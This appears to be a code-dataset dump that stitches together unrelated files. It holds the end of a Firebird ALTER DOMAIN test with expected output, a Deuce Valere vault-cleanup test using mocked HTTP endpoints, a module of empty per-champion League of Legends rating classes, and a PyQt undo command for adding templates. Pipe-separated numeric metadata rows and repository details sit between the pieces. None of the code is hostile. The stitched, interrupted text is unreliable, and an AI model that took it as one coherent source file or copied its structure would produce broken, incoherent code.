DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1ea
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_03
DM_TYPE 16
DM_SUBTYPE 0
DM_FLEN 8
DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1ee
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_04
DM_TYPE 12
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1f2
check( value < current_date )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_05
DM_TYPE 13
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1f6
check( value < current_time )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_06
DM_TYPE 28
DM_SUBTYPE <null>
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1fa
check( value < '23:34:45.678 Pacific/Galapagos' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_07
DM_TYPE 13
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1fe
check( value < current_timestamp )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_08
DM_TYPE 29
DM_SUBTYPE <null>
DM_FLEN 12
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:202
check( value < '27.03.2015 23:34:45.678 Pacific/Galapagos' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_09
DM_TYPE 14
DM_SUBTYPE 0
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 4
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:206
check( value = '¢' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_10
DM_TYPE 37
DM_SUBTYPE 0
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 4
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:20a
check( value = '¢' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_11
DM_TYPE 14
DM_SUBTYPE 0
DM_FLEN 1
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 21
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:20e
check( value = 'Ÿ' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_12
DM_TYPE 7
DM_SUBTYPE 1
DM_FLEN 2
DM_FSCALE -2
DM_FPREC 2
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:212
check( value = -327.68 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_13
DM_TYPE 8
DM_SUBTYPE 2
DM_FLEN 4
DM_FSCALE -2
DM_FPREC 2
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:216
check( value = -327.68 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_14
DM_TYPE 10
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:21a
check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_15
DM_TYPE 10
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:21e
check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_16
DM_TYPE 27
DM_SUBTYPE <null>
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:222
check( value >= 2e-308 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_17
DM_TYPE 261
DM_SUBTYPE 0
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:226
check( value =
'
')
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_18
DM_TYPE 23
DM_SUBTYPE <null>
DM_FLEN 1
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:22a
check( value is not null )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_19
DM_TYPE 25
DM_SUBTYPE <null>
DM_FLEN 16
DM_FSCALE 0
DM_FPREC 34
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:22e
check( value is not null )
DM_FDEFAULT_BLOB_ID <null>
Records affected: 19
"""
# Expected STDERR: for every domain, two SQLSTATE 42000 failures ("Only one
# constraint allowed for a domain") — one for the plain ADD, one for the
# final ADD after the combined ADD/DROP statement succeeded.
expected_stderr_1 = """
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_01 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_01 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_02 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_02 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_03 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_03 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_04 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_04 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_05 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_05 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_06 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_06 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_07 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_07 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_08 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_08 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_09 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_09 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_10 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_10 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_11 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_11 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_12 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_12 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_13 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_13 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_14 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_14 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_15 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_15 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_16 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_16 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_17 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_17 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_18 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_18 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_19 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_19 failed
-"Only one constraint allowed for a domain"
"""
@pytest.mark.version('>=4.0')
def test_1(act_1: Action):
    """Execute the test script and compare the cleaned output streams.

    stderr is checked first (the expected metadata-update failures), then
    stdout, each against the expectation blocks defined at module level.
    """
    act_1.expected_stdout = expected_stdout_1
    act_1.expected_stderr = expected_stderr_1
    act_1.execute()
    observed_err, wanted_err = act_1.clean_stderr, act_1.clean_expected_stderr
    assert observed_err == wanted_err
    observed_out, wanted_out = act_1.clean_stdout, act_1.clean_expected_stdout
    assert observed_out == wanted_out
| 57.97479
| 285
| 0.640465
| 3,133
| 48,293
| 9.699968
| 0.103096
| 1.059559
| 1.579467
| 2.092794
| 0.902534
| 0.890128
| 0.889042
| 0.886015
| 0.837611
| 0.820829
| 0
| 0.53084
| 0.293645
| 48,293
| 832
| 286
| 58.044471
| 0.359727
| 0.045203
| 0
| 0.74507
| 0
| 0.015493
| 0.985383
| 0.412124
| 0
| 1
| 0
| 0
| 0.002817
| 1
| 0.001408
| false
| 0.001408
| 0.002817
| 0
| 0.004225
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
501e5428de25fc49f28add139cc65edd699495cf
| 12,442
|
py
|
Python
|
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
"""
Deuce Valere - Tests - Functions - Vault Cleanup
"""
import ddt
from deuceclient.tests import *
import httpretty
from deucevalere import vault_validate, vault_cleanup
from deucevalere.tests import *
from deucevalere.tests.client_base import TestValereClientBase
from deucevalere.tests.client_base import calculate_ref_modified
@httpretty.activate
class TestConvenienceFunctions(TestValereClientBase):
    """Exercise the vault_validate/vault_cleanup convenience functions.

    Each test wires httpretty mocks for the Deuce metadata and storage
    endpoints and then checks the integer status returned by the cleanup
    pipeline (0 = success; non-zero encodes which deletion phase failed).
    """

    def setUp(self):
        super().setUp()
        self.project_id = create_project_name()
        self.vault_id = create_vault_name()
        # 20 referenced blocks plus 10 orphans gives both cleanup phases work.
        self.generate_blocks(count=20)
        self.generate_orphaned_blocks(count=10)
        self.secondary_setup(manager_start=None,
                             manager_end=None)

    def tearDown(self):
        super().tearDown()

    def _register_vault_routes(self, metadata_delete_fails=False,
                               storage_delete_fails=False):
        """Register httpretty handlers for the vault's block endpoints.

        Listing and HEAD handlers always succeed.  The DELETE handlers return
        404 'mock failure' when the corresponding ``*_fails`` flag is set and
        an empty 204 otherwise, letting each test choose which cleanup phase
        should fail.
        """
        def metadata_listing_callback(request, uri, headers):
            return self.metadata_block_listing_success(request, uri, headers)

        def metadata_head_callback(request, uri, headers):
            return self.metadata_block_head_success(request, uri, headers)

        def metadata_delete_callback(request, uri, headers):
            if metadata_delete_fails:
                return (404, headers, 'mock failure')
            return (204, headers, '')

        def storage_listing_callback(request, uri, headers):
            return self.storage_block_listing_success(request, uri, headers)

        def storage_delete_callback(request, uri, headers):
            if storage_delete_fails:
                return (404, headers, 'mock failure')
            return (204, headers, '')

        url = get_blocks_url(self.apihost, self.vault.vault_id)
        httpretty.register_uri(httpretty.GET,
                               url,
                               body=metadata_listing_callback)
        httpretty.register_uri(httpretty.HEAD,
                               self.get_metadata_block_pattern_matcher(),
                               body=metadata_head_callback)
        httpretty.register_uri(httpretty.DELETE,
                               url,
                               body=metadata_delete_callback)
        surl = get_storage_blocks_url(self.apihost, self.vault.vault_id)
        httpretty.register_uri(httpretty.GET,
                               surl,
                               body=storage_listing_callback)
        httpretty.register_uri(httpretty.DELETE,
                               self.get_storage_block_pattern_matcher(),
                               body=storage_delete_callback)

    def _age_and_expire_blocks(self):
        """Zero the ref-count on up to 10 blocks, age them one minute past
        ``base_age_date``, and mark the first half of them as expired so the
        metadata-deletion phase has concrete work to do."""
        base_age_date = datetime.datetime.utcnow()
        key_set = sorted(
            list(self.meta_data.keys()))[0:minmax(len(self.meta_data), 10)]
        for key in key_set:
            self.meta_data[key].ref_count = 0
            self.meta_data[key].ref_modified = \
                calculate_ref_modified(base=base_age_date,
                                       days=0, hours=0, mins=1, secs=0)
        self.manager.metadata.expired = []
        for key in key_set[:int(len(key_set) / 2)]:
            self.manager.metadata.expired.append(key)
        self.manager.expire_age = datetime.timedelta(minutes=1)

    def test_cleanup_no_expired_blocks(self):
        # Cleanup without a prior validation pass must be rejected.
        with self.assertRaises(RuntimeError):
            vault_cleanup(self.deuce_client,
                          self.vault,
                          self.manager)

    def test_cleanup_no_orphaned_blocks(self):
        # An expired list alone is insufficient; orphan data is also required.
        self.manager.metadata.expired = []
        with self.assertRaises(RuntimeError):
            vault_cleanup(self.deuce_client,
                          self.vault,
                          self.manager)

    def test_cleanup(self):
        self._register_vault_routes()
        self.assertEqual(vault_validate(self.deuce_client,
                                        self.vault,
                                        self.manager),
                         0)
        self.assertEqual(vault_cleanup(self.deuce_client,
                                       self.vault,
                                       self.manager),
                         0)

    def test_cleanup_metadata_cleanup_error(self):
        # Metadata DELETE fails -> cleanup reports status 1.
        self._register_vault_routes(metadata_delete_fails=True)
        self._age_and_expire_blocks()
        self.assertEqual(vault_validate(self.deuce_client,
                                        self.vault,
                                        self.manager),
                         0)
        self.assertEqual(vault_cleanup(self.deuce_client,
                                       self.vault,
                                       self.manager),
                         1)

    def test_cleanup_storage_cleanup_error(self):
        # Storage DELETE fails -> cleanup reports status 2.
        self._register_vault_routes(storage_delete_fails=True)
        self.assertEqual(vault_validate(self.deuce_client,
                                        self.vault,
                                        self.manager),
                         0)
        self.assertEqual(vault_cleanup(self.deuce_client,
                                       self.vault,
                                       self.manager),
                         2)

    def test_cleanup_metadata_and_storage_cleanup_errors(self):
        # Both DELETE phases fail -> cleanup reports combined status 3.
        self._register_vault_routes(metadata_delete_fails=True,
                                    storage_delete_fails=True)
        self._age_and_expire_blocks()
        self.assertEqual(vault_validate(self.deuce_client,
                                        self.vault,
                                        self.manager),
                         0)
        self.assertEqual(vault_cleanup(self.deuce_client,
                                       self.vault,
                                       self.manager),
                         3)
| 40.527687
| 78
| 0.506269
| 1,101
| 12,442
| 5.436876
| 0.099001
| 0.053458
| 0.090879
| 0.083528
| 0.891914
| 0.891914
| 0.879886
| 0.879886
| 0.879719
| 0.879719
| 0
| 0.008713
| 0.428066
| 12,442
| 306
| 79
| 40.660131
| 0.83249
| 0.003858
| 0
| 0.880342
| 0
| 0
| 0.003875
| 0
| 0
| 0
| 0
| 0
| 0.042735
| 1
| 0.119658
| false
| 0
| 0.029915
| 0.08547
| 0.239316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aca52ef8c9ae0c046a4bc1b0e26f507f6db1f493
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Auto-generated placeholder rating models: one empty Ratings subclass per
# opposing champion for NA-region Illaoi in the Top lane.  All behaviour
# lives in the shared Ratings base class; these subclasses exist only to
# give each matchup a distinct model name.
class NA_Illaoi_Top_Aatrox(Ratings):
    pass
class NA_Illaoi_Top_Ahri(Ratings):
    pass
class NA_Illaoi_Top_Akali(Ratings):
    pass
class NA_Illaoi_Top_Alistar(Ratings):
    pass
class NA_Illaoi_Top_Amumu(Ratings):
    pass
class NA_Illaoi_Top_Anivia(Ratings):
    pass
class NA_Illaoi_Top_Annie(Ratings):
    pass
class NA_Illaoi_Top_Ashe(Ratings):
    pass
class NA_Illaoi_Top_AurelionSol(Ratings):
    pass
class NA_Illaoi_Top_Azir(Ratings):
    pass
class NA_Illaoi_Top_Bard(Ratings):
    pass
class NA_Illaoi_Top_Blitzcrank(Ratings):
    pass
class NA_Illaoi_Top_Brand(Ratings):
    pass
class NA_Illaoi_Top_Braum(Ratings):
    pass
class NA_Illaoi_Top_Caitlyn(Ratings):
    pass
class NA_Illaoi_Top_Camille(Ratings):
    pass
class NA_Illaoi_Top_Cassiopeia(Ratings):
    pass
class NA_Illaoi_Top_Chogath(Ratings):
    pass
class NA_Illaoi_Top_Corki(Ratings):
    pass
class NA_Illaoi_Top_Darius(Ratings):
    pass
class NA_Illaoi_Top_Diana(Ratings):
    pass
class NA_Illaoi_Top_Draven(Ratings):
    pass
class NA_Illaoi_Top_DrMundo(Ratings):
    pass
class NA_Illaoi_Top_Ekko(Ratings):
    pass
class NA_Illaoi_Top_Elise(Ratings):
    pass
class NA_Illaoi_Top_Evelynn(Ratings):
    pass
class NA_Illaoi_Top_Ezreal(Ratings):
    pass
class NA_Illaoi_Top_Fiddlesticks(Ratings):
    pass
class NA_Illaoi_Top_Fiora(Ratings):
    pass
class NA_Illaoi_Top_Fizz(Ratings):
    pass
class NA_Illaoi_Top_Galio(Ratings):
    pass
class NA_Illaoi_Top_Gangplank(Ratings):
    pass
class NA_Illaoi_Top_Garen(Ratings):
    pass
class NA_Illaoi_Top_Gnar(Ratings):
    pass
class NA_Illaoi_Top_Gragas(Ratings):
    pass
class NA_Illaoi_Top_Graves(Ratings):
    pass
class NA_Illaoi_Top_Hecarim(Ratings):
    pass
class NA_Illaoi_Top_Heimerdinger(Ratings):
    pass
class NA_Illaoi_Top_Illaoi(Ratings):
    pass
class NA_Illaoi_Top_Irelia(Ratings):
    pass
class NA_Illaoi_Top_Ivern(Ratings):
    pass
class NA_Illaoi_Top_Janna(Ratings):
    pass
class NA_Illaoi_Top_JarvanIV(Ratings):
    pass
class NA_Illaoi_Top_Jax(Ratings):
    pass
class NA_Illaoi_Top_Jayce(Ratings):
    pass
class NA_Illaoi_Top_Jhin(Ratings):
    pass
class NA_Illaoi_Top_Jinx(Ratings):
    pass
class NA_Illaoi_Top_Kalista(Ratings):
    pass
class NA_Illaoi_Top_Karma(Ratings):
    pass
class NA_Illaoi_Top_Karthus(Ratings):
    pass
class NA_Illaoi_Top_Kassadin(Ratings):
    pass
class NA_Illaoi_Top_Katarina(Ratings):
    pass
class NA_Illaoi_Top_Kayle(Ratings):
    pass
class NA_Illaoi_Top_Kayn(Ratings):
    pass
class NA_Illaoi_Top_Kennen(Ratings):
    pass
class NA_Illaoi_Top_Khazix(Ratings):
    pass
class NA_Illaoi_Top_Kindred(Ratings):
    pass
class NA_Illaoi_Top_Kled(Ratings):
    pass
class NA_Illaoi_Top_KogMaw(Ratings):
    pass
class NA_Illaoi_Top_Leblanc(Ratings):
    pass
class NA_Illaoi_Top_LeeSin(Ratings):
    pass
class NA_Illaoi_Top_Leona(Ratings):
    pass
class NA_Illaoi_Top_Lissandra(Ratings):
    pass
class NA_Illaoi_Top_Lucian(Ratings):
    pass
class NA_Illaoi_Top_Lulu(Ratings):
    pass
class NA_Illaoi_Top_Lux(Ratings):
    pass
class NA_Illaoi_Top_Malphite(Ratings):
    pass
class NA_Illaoi_Top_Malzahar(Ratings):
    pass
class NA_Illaoi_Top_Maokai(Ratings):
    pass
class NA_Illaoi_Top_MasterYi(Ratings):
    pass
class NA_Illaoi_Top_MissFortune(Ratings):
    pass
class NA_Illaoi_Top_MonkeyKing(Ratings):
    pass
class NA_Illaoi_Top_Mordekaiser(Ratings):
    pass
class NA_Illaoi_Top_Morgana(Ratings):
    pass
class NA_Illaoi_Top_Nami(Ratings):
    pass
class NA_Illaoi_Top_Nasus(Ratings):
    pass
class NA_Illaoi_Top_Nautilus(Ratings):
    pass
class NA_Illaoi_Top_Nidalee(Ratings):
    pass
class NA_Illaoi_Top_Nocturne(Ratings):
    pass
class NA_Illaoi_Top_Nunu(Ratings):
    pass
class NA_Illaoi_Top_Olaf(Ratings):
    pass
class NA_Illaoi_Top_Orianna(Ratings):
    pass
class NA_Illaoi_Top_Ornn(Ratings):
    pass
class NA_Illaoi_Top_Pantheon(Ratings):
    pass
class NA_Illaoi_Top_Poppy(Ratings):
    pass
class NA_Illaoi_Top_Quinn(Ratings):
    pass
class NA_Illaoi_Top_Rakan(Ratings):
    pass
class NA_Illaoi_Top_Rammus(Ratings):
    pass
class NA_Illaoi_Top_RekSai(Ratings):
    pass
class NA_Illaoi_Top_Renekton(Ratings):
    pass
class NA_Illaoi_Top_Rengar(Ratings):
    pass
class NA_Illaoi_Top_Riven(Ratings):
    pass
class NA_Illaoi_Top_Rumble(Ratings):
    pass
class NA_Illaoi_Top_Ryze(Ratings):
    pass
class NA_Illaoi_Top_Sejuani(Ratings):
    pass
class NA_Illaoi_Top_Shaco(Ratings):
    pass
class NA_Illaoi_Top_Shen(Ratings):
    pass
class NA_Illaoi_Top_Shyvana(Ratings):
    pass
class NA_Illaoi_Top_Singed(Ratings):
    pass
class NA_Illaoi_Top_Sion(Ratings):
    pass
class NA_Illaoi_Top_Sivir(Ratings):
    pass
class NA_Illaoi_Top_Skarner(Ratings):
    pass
class NA_Illaoi_Top_Sona(Ratings):
    pass
class NA_Illaoi_Top_Soraka(Ratings):
    pass
class NA_Illaoi_Top_Swain(Ratings):
    pass
class NA_Illaoi_Top_Syndra(Ratings):
    pass
class NA_Illaoi_Top_TahmKench(Ratings):
    pass
class NA_Illaoi_Top_Taliyah(Ratings):
    pass
class NA_Illaoi_Top_Talon(Ratings):
    pass
class NA_Illaoi_Top_Taric(Ratings):
    pass
class NA_Illaoi_Top_Teemo(Ratings):
    pass
class NA_Illaoi_Top_Thresh(Ratings):
    pass
class NA_Illaoi_Top_Tristana(Ratings):
    pass
class NA_Illaoi_Top_Trundle(Ratings):
    pass
class NA_Illaoi_Top_Tryndamere(Ratings):
    pass
class NA_Illaoi_Top_TwistedFate(Ratings):
    pass
class NA_Illaoi_Top_Twitch(Ratings):
    pass
class NA_Illaoi_Top_Udyr(Ratings):
    pass
class NA_Illaoi_Top_Urgot(Ratings):
    pass
class NA_Illaoi_Top_Varus(Ratings):
    pass
class NA_Illaoi_Top_Vayne(Ratings):
    pass
class NA_Illaoi_Top_Veigar(Ratings):
    pass
class NA_Illaoi_Top_Velkoz(Ratings):
    pass
class NA_Illaoi_Top_Vi(Ratings):
    pass
class NA_Illaoi_Top_Viktor(Ratings):
    pass
class NA_Illaoi_Top_Vladimir(Ratings):
    pass
class NA_Illaoi_Top_Volibear(Ratings):
    pass
class NA_Illaoi_Top_Warwick(Ratings):
    pass
class NA_Illaoi_Top_Xayah(Ratings):
    pass
class NA_Illaoi_Top_Xerath(Ratings):
    pass
class NA_Illaoi_Top_XinZhao(Ratings):
    pass
class NA_Illaoi_Top_Yasuo(Ratings):
    pass
class NA_Illaoi_Top_Yorick(Ratings):
    pass
class NA_Illaoi_Top_Zac(Ratings):
    pass
class NA_Illaoi_Top_Zed(Ratings):
    pass
class NA_Illaoi_Top_Ziggs(Ratings):
    pass
class NA_Illaoi_Top_Zilean(Ratings):
    pass
class NA_Illaoi_Top_Zyra(Ratings):
    pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
aca939736eb1c9c472b35974ea5a3c5ecf467008
| 3,133
|
py
|
Python
|
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
__author__ = 'Neil Butcher'
from PyQt4 import QtGui
class CommandAddTemplate(QtGui.QUndoCommand):
    """Undoable command that inserts a freshly created template into a model."""

    def __init__(self, model, row, parent):
        super(CommandAddTemplate, self).__init__('Added a new template')
        self.model, self.row, self.parent = model, row, parent
        # Create the template once so redo/undo always handle the same object.
        self.template = model.new_template()

    def redo(self):
        """Insert the template at the stored row and hook up its name signal."""
        mdl = self.model
        mdl.beginInsertRows(self.parent, self.row, self.row)
        mdl.templates.insert(self.row, self.template)
        self.template.nameChanged.connect(mdl._templateNameChanged)
        mdl.endInsertRows()

    def undo(self):
        """Take the template back out and detach its name signal."""
        mdl = self.model
        mdl.beginRemoveRows(self.parent, self.row, self.row)
        mdl.templates.pop(self.row)
        self.template.nameChanged.disconnect(mdl._templateNameChanged)
        mdl.endRemoveRows()
